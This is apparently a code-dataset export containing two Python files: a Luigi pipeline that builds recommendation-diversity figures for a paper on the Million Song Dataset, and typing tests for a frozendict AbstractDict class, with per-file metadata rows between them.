| 36.067308 | 63 | 0.552653 | 400 | 3,751 | 4.7275 | 0.1375 | 0.044421 | 0.046536 | 0.057113 | 0.931782 | 0.931782 | 0.931782 | 0.931782 | 0.931782 | 0.892649 | 0 | 0.006063 | 0.384431 | 3,751 | 103 | 64 | 36.417476 | 0.812906 | 0.019995 | 0 | 0.903226 | 0 | 0 | 0.018796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021505 | false | 0 | 0.010753 | 0 | 0.053763 | 0.021505 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5c242b41a90a20d8ee34bdb03228ac98ebf5fafa | 28,631 | py | Python | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | automation/paper.py | grodino/recodiv | 1fb72cd728f75441bdcd0f2af78b87a8c791799e | [
"MIT"
] | null | null | null | from typing import List
import luigi
from luigi import task
from automation.config import *
from automation.msd_dataset import *
def paper_figures(n_users: int, name: str) -> List[luigi.Task]:
msd_dataset = MsdDataset(name, n_users=n_users)
tasks = []
# General information about the dataset
tasks += [
DatasetInfo(dataset=msd_dataset),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotUsersDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
PlotUserVolumeHistogram(dataset=msd_dataset),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotTagsDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
]
# General information about the train and test sets
tasks += [
TrainTestInfo(dataset=msd_dataset),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=0),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=2),
PlotTrainTestUsersDiversitiesHistogram(dataset=msd_dataset, alpha=float('inf')),
]
# Model convergence plot
tasks += [
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=2*N_ITERATIONS,
model_n_factors=3_000,
model_regularization=float(1e6),
model_confidence_factor=CONFIDENCE_FACTOR
),
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=3*N_ITERATIONS,
model_n_factors=200,
model_regularization=float(1e-3),
model_confidence_factor=CONFIDENCE_FACTOR
),
PlotTrainLoss(
dataset=msd_dataset,
model_n_iterations=3*N_ITERATIONS,
model_n_factors=1_000,
model_regularization=float(1e6),
model_confidence_factor=CONFIDENCE_FACTOR
),
]
# User recommendations evaluation scores
tasks += [
# Best model found
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=1_000
),
# 200 factors
PlotUserEvaluationHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=200,
model_regularization=100.0,
n_recommendations=N_RECOMMENDATIONS
),
]
# Hyper parameter tuning
tasks += [
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='ndcg',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='test_loss',
tuning_best='min',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='train_loss',
tuning_best='min',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='recip_rank',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
PlotModelTuning(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization_values=REGULARIZATION_VALUES,
model_confidence_factor=CONFIDENCE_FACTOR,
tuning_metric='precision',
tuning_best='max',
n_recommendations=N_RECOMMENDATIONS
),
]
# Model performance for different number of latent factors
tasks += [
PlotModelEvaluationVsLatentFactors(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
model_confidence_factor=CONFIDENCE_FACTOR,
n_recommendations=N_RECOMMENDATIONS
)
]
# Recommendation diversity histogram at equilibrium (optimal parameters)
tasks += [
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=float('inf')
),
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=float('inf')
),
# Herfindal
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=2
),
# Richness
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=0
),
# Berger-Parker
PlotRecommendationsUsersDiversitiesHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=float('inf')
),
]
# Diversity increase histogram at equilibrium
tasks += [
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=2
),
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=2
),
# Herfindal
PlotDiversitiesIncreaseHistogram(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=2
),
]
# Recommendation diversity increase vs organic diversity at equilibrium and variations
tasks += [
# Herfindal
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[0, 75, -40, 40],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
# Richness
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[-25, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=True
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[-15, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[-15, 800, -10, 1_000],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
# Berger-Parker
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
PlotUserDiversityIncreaseVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
bounds=[0, 25, -25, 15],
users=[
'165300f45335433b38053f9b3617cc4eadaa2ecf',
'767153bf012dfe221b8bd8d45aa7d649aa37845a',
'e6cdf0de3904fc6f40171a55eaa871503593cb06',
'c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
],
show_colorbar=False
),
]
# Recommendation diversity vs organic diversity at equilibrium and variations
tasks += [
# Herfindal diversity
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
bounds=[None, 80, None, None]
),
# Richness
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
# Berger-Parker
PlotRecommendationDiversityVsUserDiversity(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
]
# Recommendation diversity vs recommendation volume at equilibrium
tasks += [
# Herfindal diversity
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
# Richness
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
# Berger-Parker
PlotDiversityVsRecommendationVolume(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
]
# Diversity increase vs recommendation volume at equilibrium
deprecated = [
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
PlotDiversityIncreaseVsRecommendationVolume(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=[5, 20, 500, 3_000],
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=N_RECOMMENDATIONS_VALUES
),
]
# Recommendation diversity versus the number of latent factors used in the model
tasks += [
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
PlotRecommendationDiversityVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500]
),
]
# Recommendation diversity versus the regularization factor used in the model
tasks += [
PlotDiversityVsRegularization(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
)
]
# Diversity increase versus the number of latent factors used in the model
tasks += [
# Herfindal
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
# Richness
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
# Berger-Parker
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS
),
PlotDiversityIncreaseVsLatentFactors(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
n_factors_values=N_FACTORS_VALUES,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500
),
]
# Diversity increase versus the regularization factor used in the model
tasks += [
# Herfindal
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=2,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
# Richness
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=0,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
# Berger-Parker
PlotDiversityIncreaseVsRegularization(
dataset=msd_dataset,
alpha=float('inf'),
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization_values=REGULARIZATION_VALUES,
n_recommendations=N_RECOMMENDATIONS
),
]
# Compare the listened, recommended and reco+listened tags distributions
tasks += [
PlotUserTagHistograms(
dataset=msd_dataset,
user='165300f45335433b38053f9b3617cc4eadaa2ecf',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='767153bf012dfe221b8bd8d45aa7d649aa37845a',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='e6cdf0de3904fc6f40171a55eaa871503593cb06',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='c0d9b4c9ca33db5a3a90fcf0072727ee0758a9c0',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
PlotUserTagHistograms(
dataset=msd_dataset,
user='f20fd75195cf378de0bb481b24936e12aabf8a19',
n_tags=20,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=50,
),
]
# Compare the best tag rank to the diversity increase of users
tasks += [
# Herfindal
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=2
),
# Richness
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=0
),
# Berger-Parker
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=N_RECOMMENDATIONS,
alpha=float('inf')
),
# Herfindal
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=2
),
# Richness
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=0
),
# Berger-Parker
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=500,
alpha=float('inf')
),
# Herfindal
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=2
),
# Richness
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=0
),
# Berger-Parker
PlotHeaviestTagRankVsPercentageIncreased(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations=10,
alpha=float('inf')
),
]
# Generate a summary of the metrics computed for a model
tasks += [
MetricsSummary(
dataset=msd_dataset,
model_n_iterations=N_ITERATIONS,
model_n_factors=OPT_N_FACTORS,
model_regularization=OPT_REGULARIZATION,
n_recommendations_values=[10, 50, 500],
alpha_values=[0, 2, float('inf')]
),
]
return tasks | 36.195954 | 90 | 0.62338 | 2,319 | 28,631 | 7.307891 | 0.065545 | 0.09217 | 0.08326 | 0.068213 | 0.912551 | 0.852186 | 0.841565 | 0.83413 | 0.831534 | 0.819024 | 0 | 0.068888 | 0.318571 | 28,631 | 791 | 91 | 36.195954 | 0.799744 | 0.054347 | 0 | 0.905233 | 0 | 0 | 0.065031 | 0.0607 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001414 | false | 0 | 0.007072 | 0 | 0.009901 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5c2bfc711ba476ec61204efae481e4742b09309d | 1,887 | py | Python | tests/test_abstract_dict.py | ominatechnologies/frozendict | f130c561a1ec53460c59167b832b01875f0d7cb9 | [
"MIT"
] | null | null | null | tests/test_abstract_dict.py | ominatechnologies/frozendict | f130c561a1ec53460c59167b832b01875f0d7cb9 | [
"MIT"
] | 4 | 2020-04-04T09:41:16.000Z | 2022-01-25T10:06:46.000Z | tests/test_abstract_dict.py | ominatechnologies/frozendict | f130c561a1ec53460c59167b832b01875f0d7cb9 | [
"MIT"
] | null | null | null | from frozendict import AbstractDict, FrozenDict
def test_abstract_dict_typing_1():
dct: AbstractDict[str, str] = {"k_1": "v_1"}
assert dct["k_1"] == "v_1"
dct: AbstractDict[str, str] = FrozenDict({"k_1": "v_1"})
assert dct["k_1"] == "v_1"
def test_abstract_dict_typing_2():
def f_1(dct: AbstractDict[str, str]):
assert dct["k_1"] == "v_1"
f_2(dct["k_1"])
# Mypy should not accept the following, but there is no equivalent to
# "pytest.raises" for asserting such failures, which is why the
# following is commented out.
#
# f_3(dct["k_1"])
def f_2(val: str):
# print(f"f_2 {val=}")
return val
# noinspection PyUnusedLocal
def f_3(val: int):
# print(f"f_3 {val=}")
return val
f_1({"k_1": "v_1"})
f_1(FrozenDict({"k_1": "v_1"}))
def test_abstract_dict_typing_3():
class ClassA:
pass
class ClassB(ClassA):
pass
def f_1(dct: AbstractDict[str, ClassA]):
f_2(dct["k_1"])
# Mypy should not accept the following, but there is no equivalent to
# "pytest.raises" for asserting such failures, which is why the
# following is commented out.
#
# f_3(dct["k_1"])
def f_2(val: ClassA):
# print(f"f_2 {val=}")
return val
# noinspection PyUnusedLocal
def f_3(val: int):
# print(f"f_3 {val=}")
return val
f_1({"k_1": ClassA()})
f_1(FrozenDict({"k_1": ClassA()}))
f_1({"k_1": ClassB()})
f_1(FrozenDict({"k_1": ClassB()}))
def test_abstract_dict_typing_4():
class ClassA:
pass
class ClassB(ClassA):
pass
def f_1(dct: AbstractDict[str, ClassB]):
f_2(dct)
def f_2(dct: AbstractDict[str, ClassA]):
return dct
f_1({"k_1": ClassB()})
f_1(FrozenDict({"k_1": ClassB()}))
| 22.73494 | 77 | 0.572337 | 281 | 1,887 | 3.6121 | 0.181495 | 0.033498 | 0.02069 | 0.027586 | 0.892611 | 0.748768 | 0.7133 | 0.7133 | 0.7133 | 0.660099 | 0 | 0.039057 | 0.280869 | 1,887 | 82 | 78 | 23.012195 | 0.708917 | 0.257022 | 0 | 0.547619 | 0 | 0 | 0.047653 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.285714 | false | 0.095238 | 0.02381 | 0.119048 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 10 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.